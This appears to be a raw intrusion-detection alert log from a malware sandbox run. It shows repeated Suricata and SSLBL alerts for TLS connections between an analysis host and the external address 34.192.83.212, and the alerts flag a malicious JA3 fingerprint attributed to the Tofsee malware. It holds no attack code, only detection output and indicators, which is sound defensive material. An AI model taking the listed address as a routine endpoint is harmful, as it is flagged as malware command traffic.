TCP 192.168.56.101:49339 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49462 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49462 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49462 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49404 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49404 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49339 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49404 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49339 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49462 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49462 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49281 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49281 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49404 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49281 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49404 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49345 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49317 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49317 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49385 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49385 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49353 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49353 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49455 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49455 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49390 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49455 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49390 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49357 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49383 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49357 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49383 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49357 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49325 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49390 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49325 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49383 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49455 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49325 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49455 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49357 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49390 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49357 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49390 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49459 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49459 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49329 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49459 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49362 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49329 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49391 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49329 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49362 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49391 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49362 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49391 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49329 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49362 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49329 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49362 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49391 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49343 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49391 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49459 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49459 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49343 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49343 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49364 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49364 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49364 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49343 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49393 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49464 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49343 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49393 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49393 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49364 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49364 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49344 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49411 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49344 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49464 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49344 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49464 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49411 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49369 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49383 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49369 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49383 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49369 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49344 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49344 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49411 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49466 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49466 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49355 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49466 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49355 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49355 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49466 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49355 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49466 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49386 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49386 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49386 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49467 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49467 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49355 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49467 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49386 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49420 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49420 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49420 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49467 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49467 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49358 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49358 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49358 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49369 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49386 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49369 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49388 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49388 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49371 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49388 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49371 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49371 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49420 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49358 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49420 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49371 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49358 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49371 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49381 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49381 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49381 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49361 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49361 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49361 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49381 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49381 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49424 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49424 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49424 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49361 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49361 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49389 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49389 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49389 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49424 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49424 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49366 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49366 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49366 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49366 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49366 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49388 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49388 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49430 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49430 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49376 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49430 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49376 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49376 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49408 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49408 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49408 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49430 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49376 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49430 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49376 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49408 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49408 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49431 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49377 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49431 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49377 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49397 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49431 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49377 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49413 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49397 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49413 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49397 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49413 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49397 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49397 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49384 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49384 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49450 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49414 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49384 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49450 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49414 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49450 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49399 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49414 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49399 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49399 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49384 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49384 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49450 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49414 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49450 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49414 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49399 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49399 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49400 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49400 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49419 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49400 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49419 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49401 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49419 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49401 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49401 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49400 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49400 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49419 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49419 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49401 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49401 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49407 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49407 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49407 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49437 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49437 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49410 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49437 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49410 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49410 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49407 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49407 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49437 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49437 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49417 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49417 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49422 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49417 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49422 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49439 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
